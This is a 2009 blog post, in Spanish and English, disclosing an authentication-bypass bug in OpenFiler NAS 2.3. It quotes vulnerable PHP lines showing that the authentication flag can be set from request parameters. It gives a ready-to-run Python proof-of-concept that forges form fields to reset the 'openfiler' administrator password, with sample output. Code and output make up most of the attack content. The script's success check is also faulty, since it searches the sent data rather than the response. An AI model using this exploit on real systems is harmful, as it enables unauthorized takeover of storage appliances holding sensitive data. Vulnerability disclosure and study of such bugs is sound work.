martes, 3 de febrero de 2009

Bug and exploit for OpenFiler 2.3

Todos saben lo que es un NAS y saben que pueden almacenar mucha información critica para una compañia, como los respaldos de las estaciones y almacenar BDs y etc. Que pasaria si alguien no autorizado pudiera convertirse en el administrador de su appliance NAS?

Los amigos de OpenFiler nunca contestaron, por eso publico esto aqui:



Distro Release: Openfiler NAS/SAN Appliance 2.3
GUI Version: r1563-2-1


Openfiler takes the pain out of deploying and managing networked storage. You bring the hardware, any industry standard server will do, combine it with our Openfiler software and the result is a powerful networked storage solution that exports your data via a full suite of industry standard storage networking protocols. Openfiler lowers deployment and maintenance costs for networked storage without compromising functionality or performance.

Author: just a nonroot user

Vuln Type: register globals or something like that

Date: 2 weeks ago, not answer from devs.



[root@nas account]# pwd
[root@nas account]#

10 require("");
13 if ($GLOBALS["userauthenticated"] == 0)
14 {
15 generic_header(array("title" => _("Your account")));
16 dual_begin(array());

you can set userauthenticated via GET, then you know.

and ...

97 form action="password.html" method="post"
98 ...

You can set the variables in the form.

then you can set the "openfiler" password to anything that you like.


You can exploit this with something like (PoC):

1 # Coded by
2 import urllib,sys,re
3 #host example:
4 host=raw_input("OpenFiler system ( include http and /): ")
5 #Super admin user
6 user='openfiler'
7 #What pass do you want?
8 password='nonroot'
9 #use it please ;)
10 fake="myladyastridcita"
11 data= urllib.urlencode({'current_password':fake , 'passcookie': fake, 'usercookie': user,'new_password': password,'confirm_new_pas sword': password,'userauthenticated':"666"})
12 response= urllib.urlopen(host+"account/password.html", data)
14 print data
15 lookup=re.compile("successfully").search
16 match=lookup(data)
17 if match:
18 print "Ok, now go and login with user:", user, " and password: ", password, " in ",host
19 else:
20 print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
21 sys.exit(2)
22 sys.exit(0)


use it:

nando:/home/nando# python
OpenFiler system ( include http and /):
Ok, now go and login with user: openfiler and password: nonroot in

That's all

Entradas populares